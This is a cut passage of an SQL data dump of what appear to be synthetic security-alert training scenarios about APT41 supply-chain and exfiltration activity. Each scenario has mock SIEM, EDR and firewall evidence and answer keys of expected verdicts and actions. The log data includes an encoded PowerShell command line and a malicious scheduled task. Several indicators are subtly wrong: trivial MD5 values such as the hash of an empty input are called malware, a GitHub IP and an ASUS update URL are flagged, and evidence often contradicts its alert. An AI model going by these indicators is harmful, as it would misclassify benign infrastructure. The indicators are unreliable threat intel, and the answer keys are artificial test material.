Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1494, 'Persistence Mechanism Detected', 'medium', 'Security Information and Event Management (SIEM)', 'A scheduled task was created to maintain persistence on the system, potentially linked to APT41 activity. Investigation required to confirm malicious intent.', 'Persistence', 'T1053.005 - Scheduled Task/Job: Scheduled Task', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:10Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"user\":\"jdoe\",\"task_name\":\"\\\\Microsoft\\\\Windows\\\\UpdateScheduler\",\"task_action\":\"C:\\\\Windows\\\\System32\\\\wscript.exe //B C:\\\\ProgramData\\\\script.js\",\"task_trigger\":\"At 01:00AM every day\",\"hash\":\"b1a2c3d4e5f67890123456789abcdef012345678\",\"filename\":\"script.js\",\"description\":\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous APT41 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1a2c3d4e5f67890123456789abcdef012345678\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash corresponds to a known malicious script used by APT41.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user, but credentials may be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:10Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.23\\\",\\\"user\\\":\\\"jdoe\\\",\\\"task_name\\\":\\\"\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\UpdateScheduler\\\",\\\"task_action\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\wscript.exe //B C:\\\\\\\\ProgramData\\\\\\\\script.js\\\",\\\"task_trigger\\\":\\\"At 01:00AM every day\\\",\\\"hash\\\":\\\"b1a2c3d4e5f67890123456789abcdef012345678\\\",\\\"filename\\\":\\\"script.js\\\",\\\"description\\\":\\\"Scheduled task created by user jdoe under suspicious circumstances. The script executed is known to be associated with APT41 operations.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1495, 'Unauthorized Access to Patient Records', 'high', 'Database Activity Monitoring', 'An unauthorized attempt was detected where a user pivoted through the network to access databases containing sensitive health insurance details.', 'Lateral Movement', 'T1078.003 - Valid Accounts: Local Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-17T14:45:32Z\",\"event_id\":\"db_access_12456\",\"database\":\"HealthDB\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"10.0.0.45\",\"query\":\"SELECT * FROM insurance_records\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"malicious_tool.exe\",\"external_attacker_ip\":\"203.0.113.5\",\"action\":\"read\",\"success\":true}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"malicious\",\"details\":\"File used in unauthorized access attempt.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User involved in suspicious database access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.089Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-17T14:45:32Z\\\",\\\"event_id\\\":\\\"db_access_12456\\\",\\\"database\\\":\\\"HealthDB\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"192.168.1.105\\\",\\\"destination_ip\\\":\\\"10.0.0.45\\\",\\\"query\\\":\\\"SELECT * FROM insurance_records\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"filename\\\":\\\"malicious_tool.exe\\\",\\\"external_attacker_ip\\\":\\\"203.0.113.5\\\",\\\"action\\\":\\\"read\\\",\\\"success\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1496, 'Data Exfiltration Alert', 'critical', 'Data Loss Prevention (DLP)', 'APT41 has initiated the transfer of sensitive patient data including health insurance information to an external server, completing their mission of data theft.', 'Exfiltration', 'T1020: Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.52\",\"protocol\":\"HTTPS\",\"file_exfiltrated\":\"patient_records_2023.zip\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user\":\"jdoe\",\"exfiltration_tool\":\"CCleanerSupplyChain_v2.exe\",\"alert_trigger\":\"DLP_Sensitive_Data_Transfer\"}', '2026-03-15 19:08:03', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.52\",\"is_critical\":true,\"osint_result\":{\"source\":\"public_osint_database\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT41 exfiltration activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with CCleaner Supply Chain malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"patient_records_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"detection_system\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive patient data\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user, credentials might be compromised\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.103Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-11T14:22:35Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.52\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_exfiltrated\\\":\\\"patient_records_2023.zip\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user\\\":\\\"jdoe\\\",\\\"exfiltration_tool\\\":\\\"CCleanerSupplyChain_v2.exe\\\",\\\"alert_trigger\\\":\\\"DLP_Sensitive_Data_Transfer\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1497, 'Suspicious Network Activity Detected', 'high', 'Network Traffic Analysis', 'Unusual outbound connections from ASUS servers have been flagged, indicating potential compromise. APT41 might be attempting to infiltrate the ASUS update server to distribute malicious payloads.', 'Initial Access', 'T1195 - Supply Chain Compromise', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"443\",\"protocol\":\"HTTPS\",\"url\":\"https://update.asus.com/firmware\",\"filename\":\"ASUS_update_v1.0.exe\",\"md5_hash\":\"3b2a9f2e9b8c1c6d9e4f2b7a2b5a4d1f\",\"user_agent\":\"ASUSUpdate/2.0\",\"user_account\":\"asus_admin\",\"event_type\":\"network_connection\",\"description\":\"An ASUS server at 192.168.1.15 is making unusual outbound connections to IP 203.0.113.45 using protocol HTTPS.\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of ASUS server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with APT41 activities.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"https://update.asus.com/firmware\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"suspicious\",\"details\":\"Potentially compromised ASUS update server.\"}},{\"id\":\"artifact_4\",\"type\":\"md5_hash\",\"value\":\"3b2a9f2e9b8c1c6d9e4f2b7a2b5a4d1f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious payload used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1498, 'Malicious Code Execution Identified', 'high', 'Endpoint Detection and Response (EDR)', 'An update package from ASUS software updates was found to contain malicious code. This code executes upon installation, deploying a backdoor that allows further exploitation of the system.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-09-25T14:32:49Z\",\"event_id\":\"EDR-456789\",\"event_type\":\"code_execution\",\"source_ip\":\"203.0.113.15\",\"internal_ip\":\"192.168.1.10\",\"user\":\"jdoe\",\"process_name\":\"ASUSUpdater.exe\",\"file_name\":\"ASUSUpdate_v3.14.exe\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"detected_behavior\":\"Supply Chain Attack\",\"threat_actor\":\"APT41\",\"associated_tactics\":[\"Supply Chain Attacks\",\"Espionage\"],\"malicious_code\":true}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with APT41 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as containing malicious code associated with APT41\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ASUSUpdate_v3.14.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareBazaar\",\"verdict\":\"malicious\",\"details\":\"Executable file used to execute APT41 malicious payload\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1499, 'Persistence Mechanisms Discovered', 'high', 'System Logs', 'The attackers have embedded persistence mechanisms within the affected systems, allowing for ongoing access.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T08:45:12Z\",\"event_id\":\"4624\",\"source_ip\":\"185.199.108.153\",\"internal_ip\":\"192.168.1.45\",\"username\":\"compromised_user\",\"filename\":\"taskhostw.exe\",\"hash\":\"3f5c3a6b2f9e4c5d9c3f8b7e6b8d5e4c\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"action\":\"Registry value added\"}', '2026-03-15 19:08:36', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"suspicious\",\"details\":\"User involved in unauthorized 